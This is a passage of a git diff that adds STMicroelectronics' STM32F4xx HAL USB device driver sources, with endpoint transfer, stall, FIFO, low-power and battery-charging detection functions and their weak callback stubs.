HAL_PCD_WKUP_IRQHandler(PCD_HandleTypeDef *hpcd) +{ + USB_OTG_GlobalTypeDef *USBx; + + USBx = hpcd->Instance; + + if ((USBx->CID & (0x1U << 8)) == 0U) + { + /* Clear EXTI pending Bit */ + __HAL_USB_OTG_FS_WAKEUP_EXTI_CLEAR_FLAG(); + } + else + { + /* Clear EXTI pending Bit */ + __HAL_USB_OTG_HS_WAKEUP_EXTI_CLEAR_FLAG(); + } +} +#endif /* defined (USB_OTG_FS) || defined (USB_OTG_HS) */ + + +/** + * @brief Data OUT stage callback. + * @param hpcd PCD handle + * @param epnum endpoint number + * @retval None + */ +__weak void HAL_PCD_DataOutStageCallback(PCD_HandleTypeDef *hpcd, uint8_t epnum) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpcd); + UNUSED(epnum); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_PCD_DataOutStageCallback could be implemented in the user file + */ +} + +/** + * @brief Data IN stage callback + * @param hpcd PCD handle + * @param epnum endpoint number + * @retval None + */ +__weak void HAL_PCD_DataInStageCallback(PCD_HandleTypeDef *hpcd, uint8_t epnum) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpcd); + UNUSED(epnum); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_PCD_DataInStageCallback could be implemented in the user file + */ +} +/** + * @brief Setup stage callback + * @param hpcd PCD handle + * @retval None + */ +__weak void HAL_PCD_SetupStageCallback(PCD_HandleTypeDef *hpcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_PCD_SetupStageCallback could be implemented in the user file + */ +} + +/** + * @brief USB Start Of Frame callback. + * @param hpcd PCD handle + * @retval None + */ +__weak void HAL_PCD_SOFCallback(PCD_HandleTypeDef *hpcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_PCD_SOFCallback could be implemented in the user file + */ +} + +/** + * @brief USB Reset callback. + * @param hpcd PCD handle + * @retval None + */ +__weak void HAL_PCD_ResetCallback(PCD_HandleTypeDef *hpcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_PCD_ResetCallback could be implemented in the user file + */ +} + +/** + * @brief Suspend event callback. + * @param hpcd PCD handle + * @retval None + */ +__weak void HAL_PCD_SuspendCallback(PCD_HandleTypeDef *hpcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_PCD_SuspendCallback could be implemented in the user file + */ +} + +/** + * @brief Resume event callback. + * @param hpcd PCD handle + * @retval None + */ +__weak void HAL_PCD_ResumeCallback(PCD_HandleTypeDef *hpcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_PCD_ResumeCallback could be implemented in the user file + */ +} + +/** + * @brief Incomplete ISO OUT callback. + * @param hpcd PCD handle + * @param epnum endpoint number + * @retval None + */ +__weak void HAL_PCD_ISOOUTIncompleteCallback(PCD_HandleTypeDef *hpcd, uint8_t epnum) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpcd); + UNUSED(epnum); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_PCD_ISOOUTIncompleteCallback could be implemented in the user file + */ +} + +/** + * @brief Incomplete ISO IN callback. + * @param hpcd PCD handle + * @param epnum endpoint number + * @retval None + */ +__weak void HAL_PCD_ISOINIncompleteCallback(PCD_HandleTypeDef *hpcd, uint8_t epnum) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpcd); + UNUSED(epnum); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_PCD_ISOINIncompleteCallback could be implemented in the user file + */ +} + +/** + * @brief Connection event callback. + * @param hpcd PCD handle + * @retval None + */ +__weak void HAL_PCD_ConnectCallback(PCD_HandleTypeDef *hpcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_PCD_ConnectCallback could be implemented in the user file + */ +} + +/** + * @brief Disconnection event callback. + * @param hpcd PCD handle + * @retval None + */ +__weak void HAL_PCD_DisconnectCallback(PCD_HandleTypeDef *hpcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_PCD_DisconnectCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup PCD_Exported_Functions_Group3 Peripheral Control functions + * @brief management functions + * +@verbatim + =============================================================================== + ##### Peripheral Control functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to control the PCD data + transfers. + +@endverbatim + * @{ + */ + +/** + * @brief Connect the USB device + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_DevConnect(PCD_HandleTypeDef *hpcd) +{ + USB_OTG_GlobalTypeDef *USBx = hpcd->Instance; + + __HAL_LOCK(hpcd); + + if ((hpcd->Init.battery_charging_enable == 1U) && + (hpcd->Init.phy_itface != USB_OTG_ULPI_PHY)) + { + /* Enable USB Transceiver */ + USBx->GCCFG |= USB_OTG_GCCFG_PWRDWN; + } + (void)USB_DevConnect(hpcd->Instance); + __HAL_UNLOCK(hpcd); + + return HAL_OK; +} + +/** + * @brief Disconnect the USB device. + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_DevDisconnect(PCD_HandleTypeDef *hpcd) +{ + USB_OTG_GlobalTypeDef *USBx = hpcd->Instance; + + __HAL_LOCK(hpcd); + (void)USB_DevDisconnect(hpcd->Instance); + + if ((hpcd->Init.battery_charging_enable == 1U) && + (hpcd->Init.phy_itface != USB_OTG_ULPI_PHY)) + { + /* Disable USB Transceiver */ + USBx->GCCFG &= ~(USB_OTG_GCCFG_PWRDWN); + } + + __HAL_UNLOCK(hpcd); + + return HAL_OK; +} + +/** + * @brief Set the USB Device address. + * @param hpcd PCD handle + * @param address new device address + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_SetAddress(PCD_HandleTypeDef *hpcd, uint8_t address) +{ + __HAL_LOCK(hpcd); + hpcd->USB_Address = address; + (void)USB_SetDevAddress(hpcd->Instance, address); + __HAL_UNLOCK(hpcd); + + return HAL_OK; +} +/** + * @brief Open and configure an endpoint. + * @param hpcd PCD handle + * @param ep_addr endpoint address + * @param ep_mps endpoint max packet size + * @param ep_type endpoint type + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_EP_Open(PCD_HandleTypeDef *hpcd, uint8_t ep_addr, + uint16_t ep_mps, uint8_t ep_type) +{ + HAL_StatusTypeDef ret = HAL_OK; + PCD_EPTypeDef *ep; + + if ((ep_addr & 0x80U) == 0x80U) + { + ep = &hpcd->IN_ep[ep_addr & EP_ADDR_MSK]; + ep->is_in = 1U; + } + else + { + ep = &hpcd->OUT_ep[ep_addr & EP_ADDR_MSK]; + ep->is_in = 0U; + } + + ep->num = ep_addr & EP_ADDR_MSK; + ep->maxpacket = ep_mps; + ep->type = ep_type; + + if (ep->is_in != 0U) + { + /* Assign a Tx FIFO */ + ep->tx_fifo_num = ep->num; + } + /* Set initial data PID. */ + if (ep_type == EP_TYPE_BULK) + { + ep->data_pid_start = 0U; + } + + __HAL_LOCK(hpcd); + (void)USB_ActivateEndpoint(hpcd->Instance, ep); + __HAL_UNLOCK(hpcd); + + return ret; +} + +/** + * @brief Deactivate an endpoint. + * @param hpcd PCD handle + * @param ep_addr endpoint address + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_EP_Close(PCD_HandleTypeDef *hpcd, uint8_t ep_addr) +{ + PCD_EPTypeDef *ep; + + if ((ep_addr & 0x80U) == 0x80U) + { + ep = &hpcd->IN_ep[ep_addr & EP_ADDR_MSK]; + ep->is_in = 1U; + } + else + { + ep = &hpcd->OUT_ep[ep_addr & EP_ADDR_MSK]; + ep->is_in = 0U; + } + ep->num = ep_addr & EP_ADDR_MSK; + + __HAL_LOCK(hpcd); + (void)USB_DeactivateEndpoint(hpcd->Instance, ep); + __HAL_UNLOCK(hpcd); + return HAL_OK; +} + + +/** + * @brief Receive an amount of data. + * @param hpcd PCD handle + * @param ep_addr endpoint address + * @param pBuf pointer to the reception buffer + * @param len amount of data to be received + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_EP_Receive(PCD_HandleTypeDef *hpcd, uint8_t ep_addr, uint8_t *pBuf, uint32_t len) +{ + PCD_EPTypeDef *ep; + + ep = &hpcd->OUT_ep[ep_addr & EP_ADDR_MSK]; + + /*setup and start the Xfer */ + ep->xfer_buff = pBuf; + ep->xfer_len = len; + ep->xfer_count = 0U; + ep->is_in = 0U; + ep->num = ep_addr & EP_ADDR_MSK; + + if (hpcd->Init.dma_enable == 1U) + { + ep->dma_addr = (uint32_t)pBuf; + } + + if ((ep_addr & EP_ADDR_MSK) == 0U) + { + (void)USB_EP0StartXfer(hpcd->Instance, ep, (uint8_t)hpcd->Init.dma_enable); + } + else + { + (void)USB_EPStartXfer(hpcd->Instance, ep, (uint8_t)hpcd->Init.dma_enable); + } + + return HAL_OK; +} + +/** + * @brief Get Received Data Size + * @param hpcd PCD handle + * @param ep_addr endpoint address + * @retval Data Size + */ +uint32_t HAL_PCD_EP_GetRxCount(PCD_HandleTypeDef *hpcd, uint8_t ep_addr) +{ + return hpcd->OUT_ep[ep_addr & EP_ADDR_MSK].xfer_count; +} +/** + * @brief Send an amount of data + * @param hpcd PCD handle + * @param ep_addr endpoint address + * @param pBuf pointer to the transmission buffer + * @param len amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_EP_Transmit(PCD_HandleTypeDef *hpcd, uint8_t ep_addr, uint8_t *pBuf, uint32_t len) +{ + PCD_EPTypeDef *ep; + + ep = &hpcd->IN_ep[ep_addr & EP_ADDR_MSK]; + + /*setup and start the Xfer */ + ep->xfer_buff = pBuf; + ep->xfer_len = len; + ep->xfer_count = 0U; + ep->is_in = 1U; + ep->num = ep_addr & EP_ADDR_MSK; + + if (hpcd->Init.dma_enable == 1U) + { + ep->dma_addr = (uint32_t)pBuf; + } + + if ((ep_addr & EP_ADDR_MSK) == 0U) + { + (void)USB_EP0StartXfer(hpcd->Instance, ep, (uint8_t)hpcd->Init.dma_enable); + } + else + { + (void)USB_EPStartXfer(hpcd->Instance, ep, (uint8_t)hpcd->Init.dma_enable); + } + + return HAL_OK; +} + +/** + * @brief Set a STALL condition over an endpoint + * @param hpcd PCD handle + * @param ep_addr endpoint address + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_EP_SetStall(PCD_HandleTypeDef *hpcd, uint8_t ep_addr) +{ + PCD_EPTypeDef *ep; + + if (((uint32_t)ep_addr & EP_ADDR_MSK) > hpcd->Init.dev_endpoints) + { + return HAL_ERROR; + } + + if ((0x80U & ep_addr) == 0x80U) + { + ep = &hpcd->IN_ep[ep_addr & EP_ADDR_MSK]; + ep->is_in = 1U; + } + else + { + ep = &hpcd->OUT_ep[ep_addr]; + ep->is_in = 0U; + } + + ep->is_stall = 1U; + ep->num = ep_addr & EP_ADDR_MSK; + + __HAL_LOCK(hpcd); + + (void)USB_EPSetStall(hpcd->Instance, ep); + + if ((ep_addr & EP_ADDR_MSK) == 0U) + { + (void)USB_EP0_OutStart(hpcd->Instance, (uint8_t)hpcd->Init.dma_enable, (uint8_t *)hpcd->Setup); + } + + __HAL_UNLOCK(hpcd); + + return HAL_OK; +} + +/** + * @brief Clear a STALL condition over in an endpoint + * @param hpcd PCD handle + * @param ep_addr endpoint address + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_EP_ClrStall(PCD_HandleTypeDef *hpcd, uint8_t ep_addr) +{ + PCD_EPTypeDef *ep; + + if (((uint32_t)ep_addr & 0x0FU) > hpcd->Init.dev_endpoints) + { + return HAL_ERROR; + } + + if ((0x80U & ep_addr) == 0x80U) + { + ep = &hpcd->IN_ep[ep_addr & EP_ADDR_MSK]; + ep->is_in = 1U; + } + else + { + ep = &hpcd->OUT_ep[ep_addr & EP_ADDR_MSK]; + ep->is_in = 0U; + } + + ep->is_stall = 0U; + ep->num = ep_addr & EP_ADDR_MSK; + + __HAL_LOCK(hpcd); + (void)USB_EPClearStall(hpcd->Instance, ep); + __HAL_UNLOCK(hpcd); + + return HAL_OK; +} + +/** + * @brief Flush an endpoint + * @param hpcd PCD handle + * @param ep_addr endpoint address + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_EP_Flush(PCD_HandleTypeDef *hpcd, uint8_t ep_addr) +{ + __HAL_LOCK(hpcd); + + if ((ep_addr & 0x80U) == 0x80U) + { + (void)USB_FlushTxFifo(hpcd->Instance, (uint32_t)ep_addr & EP_ADDR_MSK); + } + else + { + (void)USB_FlushRxFifo(hpcd->Instance); + } + + __HAL_UNLOCK(hpcd); + + return HAL_OK; +} + +/** + * @brief Activate remote wakeup signalling + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_ActivateRemoteWakeup(PCD_HandleTypeDef *hpcd) +{ + return (USB_ActivateRemoteWakeup(hpcd->Instance)); +} + +/** + * @brief De-activate remote wakeup signalling. + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_DeActivateRemoteWakeup(PCD_HandleTypeDef *hpcd) +{ + return (USB_DeActivateRemoteWakeup(hpcd->Instance)); +} + +/** + * @} + */ + +/** @defgroup PCD_Exported_Functions_Group4 Peripheral State functions + * @brief Peripheral State functions + * +@verbatim + =============================================================================== + ##### Peripheral State functions ##### + =============================================================================== + [..] + This subsection permits to get in run-time the status of the peripheral + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief Return the PCD handle state. + * @param hpcd PCD handle + * @retval HAL state + */ +PCD_StateTypeDef HAL_PCD_GetState(PCD_HandleTypeDef *hpcd) +{ + return hpcd->State; +} + +/** + * @} + */ + +/** + * @} + */ + +/* Private functions ---------------------------------------------------------*/ +/** @addtogroup PCD_Private_Functions + * @{ + */ +#if defined (USB_OTG_FS) || defined (USB_OTG_HS) +/** + * @brief Check FIFO for the next packet to be loaded. + * @param hpcd PCD handle + * @param epnum endpoint number + * @retval HAL status + */ +static HAL_StatusTypeDef PCD_WriteEmptyTxFifo(PCD_HandleTypeDef *hpcd, uint32_t epnum) +{ + USB_OTG_GlobalTypeDef *USBx = hpcd->Instance; + uint32_t USBx_BASE = (uint32_t)USBx; + USB_OTG_EPTypeDef *ep; + uint32_t len; + uint32_t len32b; + uint32_t fifoemptymsk; + + ep = &hpcd->IN_ep[epnum]; + + if (ep->xfer_count > ep->xfer_len) + { + return HAL_ERROR; + } + + len = ep->xfer_len - ep->xfer_count; + + if (len > ep->maxpacket) + { + len = ep->maxpacket; + } + + len32b = (len + 3U) / 4U; + + while (((USBx_INEP(epnum)->DTXFSTS & USB_OTG_DTXFSTS_INEPTFSAV) >= len32b) && + (ep->xfer_count < ep->xfer_len) && (ep->xfer_len != 0U)) + { + /* Write the FIFO */ + len = ep->xfer_len - ep->xfer_count; + + if (len > ep->maxpacket) + { + len = ep->maxpacket; + } + len32b = (len + 3U) / 4U; + + (void)USB_WritePacket(USBx, ep->xfer_buff, (uint8_t)epnum, (uint16_t)len, + (uint8_t)hpcd->Init.dma_enable); + + ep->xfer_buff += len; + ep->xfer_count += len; + } + + if (ep->xfer_len <= ep->xfer_count) + { + fifoemptymsk = (uint32_t)(0x1UL << (epnum & EP_ADDR_MSK)); + USBx_DEVICE->DIEPEMPMSK &= ~fifoemptymsk; + } + + return HAL_OK; +} + + +/** + * @brief process EP OUT transfer complete interrupt. + * @param hpcd PCD handle + * @param epnum endpoint number + * @retval HAL status + */ +static HAL_StatusTypeDef PCD_EP_OutXfrComplete_int(PCD_HandleTypeDef *hpcd, uint32_t epnum) +{ + USB_OTG_GlobalTypeDef *USBx = hpcd->Instance; + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t gSNPSiD = *(__IO uint32_t *)(&USBx->CID + 0x1U); + uint32_t DoepintReg = USBx_OUTEP(epnum)->DOEPINT; + + if (hpcd->Init.dma_enable == 1U) + { + if ((DoepintReg & USB_OTG_DOEPINT_STUP) == USB_OTG_DOEPINT_STUP) /* Class C */ + { + /* StupPktRcvd = 1 this is a setup packet */ + if ((gSNPSiD > USB_OTG_CORE_ID_300A) && + ((DoepintReg & USB_OTG_DOEPINT_STPKTRX) == USB_OTG_DOEPINT_STPKTRX)) + { + CLEAR_OUT_EP_INTR(epnum, USB_OTG_DOEPINT_STPKTRX); + } + } + else if ((DoepintReg & USB_OTG_DOEPINT_OTEPSPR) == USB_OTG_DOEPINT_OTEPSPR) /* Class E */ + { + CLEAR_OUT_EP_INTR(epnum, USB_OTG_DOEPINT_OTEPSPR); + } + else if ((DoepintReg & (USB_OTG_DOEPINT_STUP | USB_OTG_DOEPINT_OTEPSPR)) == 0U) + { + /* StupPktRcvd = 1 this is a setup packet */ + if ((gSNPSiD > USB_OTG_CORE_ID_300A) && + ((DoepintReg & USB_OTG_DOEPINT_STPKTRX) == USB_OTG_DOEPINT_STPKTRX)) + { + CLEAR_OUT_EP_INTR(epnum, USB_OTG_DOEPINT_STPKTRX); + } + else + { + /* out data packet received over EP0 */ + hpcd->OUT_ep[epnum].xfer_count = + hpcd->OUT_ep[epnum].maxpacket - + (USBx_OUTEP(epnum)->DOEPTSIZ & USB_OTG_DOEPTSIZ_XFRSIZ); + + hpcd->OUT_ep[epnum].xfer_buff += hpcd->OUT_ep[epnum].maxpacket; + + if ((epnum == 0U) && (hpcd->OUT_ep[epnum].xfer_len == 0U)) + { + /* this is ZLP, so prepare EP0 for next setup */ + (void)USB_EP0_OutStart(hpcd->Instance, 1U, (uint8_t *)hpcd->Setup); + } +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->DataOutStageCallback(hpcd, (uint8_t)epnum); +#else + HAL_PCD_DataOutStageCallback(hpcd, (uint8_t)epnum); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + } + } + else + { + /* ... */ + } + } + else + { + if (gSNPSiD == USB_OTG_CORE_ID_310A) + { + /* StupPktRcvd = 1 this is a setup packet */ + if ((DoepintReg & USB_OTG_DOEPINT_STPKTRX) == USB_OTG_DOEPINT_STPKTRX) + { + CLEAR_OUT_EP_INTR(epnum, USB_OTG_DOEPINT_STPKTRX); + } + else + { + if ((DoepintReg & USB_OTG_DOEPINT_OTEPSPR) == USB_OTG_DOEPINT_OTEPSPR) + { + CLEAR_OUT_EP_INTR(epnum, USB_OTG_DOEPINT_OTEPSPR); + } + +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->DataOutStageCallback(hpcd, (uint8_t)epnum); +#else + HAL_PCD_DataOutStageCallback(hpcd, (uint8_t)epnum); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + } + } + else + { + if ((epnum == 0U) && (hpcd->OUT_ep[epnum].xfer_len == 0U)) + { + /* this is ZLP, so prepare EP0 for next setup */ + (void)USB_EP0_OutStart(hpcd->Instance, 0U, (uint8_t *)hpcd->Setup); + } + +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->DataOutStageCallback(hpcd, (uint8_t)epnum); +#else + HAL_PCD_DataOutStageCallback(hpcd, (uint8_t)epnum); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + } + } + + return HAL_OK; +} + + +/** + * @brief process EP OUT setup packet received interrupt. + * @param hpcd PCD handle + * @param epnum endpoint number + * @retval HAL status + */ +static HAL_StatusTypeDef PCD_EP_OutSetupPacket_int(PCD_HandleTypeDef *hpcd, uint32_t epnum) +{ + USB_OTG_GlobalTypeDef *USBx = hpcd->Instance; + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t gSNPSiD = *(__IO uint32_t *)(&USBx->CID + 0x1U); + uint32_t DoepintReg = USBx_OUTEP(epnum)->DOEPINT; + + if ((gSNPSiD > USB_OTG_CORE_ID_300A) && + ((DoepintReg & USB_OTG_DOEPINT_STPKTRX) == USB_OTG_DOEPINT_STPKTRX)) + { + CLEAR_OUT_EP_INTR(epnum, USB_OTG_DOEPINT_STPKTRX); + } + + /* Inform the upper layer that a setup packet is available */ +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->SetupStageCallback(hpcd); +#else + HAL_PCD_SetupStageCallback(hpcd); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + + if ((gSNPSiD > USB_OTG_CORE_ID_300A) && (hpcd->Init.dma_enable == 1U)) + { + (void)USB_EP0_OutStart(hpcd->Instance, 1U, (uint8_t *)hpcd->Setup); + } + + return HAL_OK; +} +#endif /* defined (USB_OTG_FS) || defined (USB_OTG_HS) */ + + +/** + * @} + */ +#endif /* defined (USB_OTG_FS) || defined (USB_OTG_HS) */ +#endif /* HAL_PCD_MODULE_ENABLED */ + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_pcd_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_pcd_ex.c new file mode 100644 index 000000000..7c7697c67 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_pcd_ex.c @@ -0,0 +1,348 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_pcd_ex.c + * @author MCD Application Team + * @brief PCD Extended HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the USB Peripheral Controller: + * + Extended features functions + * + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup PCDEx PCDEx + * @brief PCD Extended HAL module driver + * @{ + */ + +#ifdef HAL_PCD_MODULE_ENABLED + +#if defined (USB_OTG_FS) || defined (USB_OTG_HS) +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup PCDEx_Exported_Functions PCDEx Exported Functions + * @{ + */ + +/** @defgroup PCDEx_Exported_Functions_Group1 Peripheral Control functions + * @brief PCDEx control functions + * +@verbatim + =============================================================================== + ##### Extended features functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Update FIFO configuration + +@endverbatim + * @{ + */ +#if defined (USB_OTG_FS) || defined (USB_OTG_HS) +/** + * @brief Set Tx FIFO + * @param hpcd PCD handle + * @param fifo The number of Tx fifo + * @param size Fifo size + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCDEx_SetTxFiFo(PCD_HandleTypeDef *hpcd, uint8_t fifo, uint16_t size) +{ + uint8_t i; + uint32_t Tx_Offset; + + /* TXn min size = 16 words. (n : Transmit FIFO index) + When a TxFIFO is not used, the Configuration should be as follows: + case 1 : n > m and Txn is not used (n,m : Transmit FIFO indexes) + --> Txm can use the space allocated for Txn. + case2 : n < m and Txn is not used (n,m : Transmit FIFO indexes) + --> Txn should be configured with the minimum space of 16 words + The FIFO is used optimally when used TxFIFOs are allocated in the top + of the FIFO.Ex: use EP1 and EP2 as IN instead of EP1 and EP3 as IN ones. + When DMA is used 3n * FIFO locations should be reserved for internal DMA registers */ + + Tx_Offset = hpcd->Instance->GRXFSIZ; + + if (fifo == 0U) + { + hpcd->Instance->DIEPTXF0_HNPTXFSIZ = ((uint32_t)size << 16) | Tx_Offset; + } + else + { + Tx_Offset += (hpcd->Instance->DIEPTXF0_HNPTXFSIZ) >> 16; + for (i = 0U; i < (fifo - 1U); i++) + { + Tx_Offset += (hpcd->Instance->DIEPTXF[i] >> 16); + } + + /* Multiply Tx_Size by 2 to get higher performance */ + hpcd->Instance->DIEPTXF[fifo - 1U] = ((uint32_t)size << 16) | Tx_Offset; + } + + return HAL_OK; +} + +/** + * @brief Set Rx FIFO + * @param hpcd PCD handle + * @param size Size of Rx fifo + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCDEx_SetRxFiFo(PCD_HandleTypeDef *hpcd, uint16_t size) +{ + hpcd->Instance->GRXFSIZ = size; + + return HAL_OK; +} +#if defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) +/** + * @brief Activate LPM feature. + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCDEx_ActivateLPM(PCD_HandleTypeDef *hpcd) +{ + USB_OTG_GlobalTypeDef *USBx = hpcd->Instance; + + hpcd->lpm_active = 1U; + hpcd->LPM_State = LPM_L0; + USBx->GINTMSK |= USB_OTG_GINTMSK_LPMINTM; + USBx->GLPMCFG |= (USB_OTG_GLPMCFG_LPMEN | USB_OTG_GLPMCFG_LPMACK | USB_OTG_GLPMCFG_ENBESL); + + return HAL_OK; +} + +/** + * @brief Deactivate LPM feature. + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCDEx_DeActivateLPM(PCD_HandleTypeDef *hpcd) +{ + USB_OTG_GlobalTypeDef *USBx = hpcd->Instance; + + hpcd->lpm_active = 0U; + USBx->GINTMSK &= ~USB_OTG_GINTMSK_LPMINTM; + USBx->GLPMCFG &= ~(USB_OTG_GLPMCFG_LPMEN | USB_OTG_GLPMCFG_LPMACK | USB_OTG_GLPMCFG_ENBESL); + + return HAL_OK; +} +#endif /* defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) */ +#if defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) +/** + * @brief Handle BatteryCharging Process. + * @param hpcd PCD handle + * @retval HAL status + */ +void HAL_PCDEx_BCD_VBUSDetect(PCD_HandleTypeDef *hpcd) +{ + USB_OTG_GlobalTypeDef *USBx = hpcd->Instance; + uint32_t tickstart = HAL_GetTick(); + + /* Enable DCD : Data Contact Detect */ + USBx->GCCFG |= USB_OTG_GCCFG_DCDEN; + + /* Wait Detect flag or a timeout is happen */ + while ((USBx->GCCFG & USB_OTG_GCCFG_DCDET) == 0U) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > 1000U) + { +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->BCDCallback(hpcd, PCD_BCD_ERROR); +#else + HAL_PCDEx_BCD_Callback(hpcd, PCD_BCD_ERROR); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + + return; + } + } + + /* Right response got */ + HAL_Delay(200U); + + /* Check Detect flag*/ + if ((USBx->GCCFG & USB_OTG_GCCFG_DCDET) == USB_OTG_GCCFG_DCDET) + { +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->BCDCallback(hpcd, PCD_BCD_CONTACT_DETECTION); +#else + HAL_PCDEx_BCD_Callback(hpcd, PCD_BCD_CONTACT_DETECTION); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + } + + /*Primary detection: checks if connected to Standard Downstream Port + (without charging capability) */ + USBx->GCCFG &= ~ USB_OTG_GCCFG_DCDEN; + HAL_Delay(50U); + USBx->GCCFG |= USB_OTG_GCCFG_PDEN; + HAL_Delay(50U); + + if ((USBx->GCCFG & USB_OTG_GCCFG_PDET) == 0U) + { + /* Case of Standard Downstream Port */ +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->BCDCallback(hpcd, PCD_BCD_STD_DOWNSTREAM_PORT); +#else + HAL_PCDEx_BCD_Callback(hpcd, PCD_BCD_STD_DOWNSTREAM_PORT); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + } + else + { + /* start secondary detection to check connection to Charging Downstream + Port or Dedicated Charging Port */ + USBx->GCCFG &= ~ USB_OTG_GCCFG_PDEN; + HAL_Delay(50U); + USBx->GCCFG |= USB_OTG_GCCFG_SDEN; + HAL_Delay(50U); + + if ((USBx->GCCFG & USB_OTG_GCCFG_SDET) == USB_OTG_GCCFG_SDET) + { + /* case Dedicated Charging Port */ +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->BCDCallback(hpcd, PCD_BCD_DEDICATED_CHARGING_PORT); +#else + HAL_PCDEx_BCD_Callback(hpcd, PCD_BCD_DEDICATED_CHARGING_PORT); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + } + else + { + /* case Charging Downstream Port */ +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->BCDCallback(hpcd, PCD_BCD_CHARGING_DOWNSTREAM_PORT); +#else + HAL_PCDEx_BCD_Callback(hpcd, PCD_BCD_CHARGING_DOWNSTREAM_PORT); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + } + } + + /* Battery Charging capability discovery finished */ + (void)HAL_PCDEx_DeActivateBCD(hpcd); + +#if 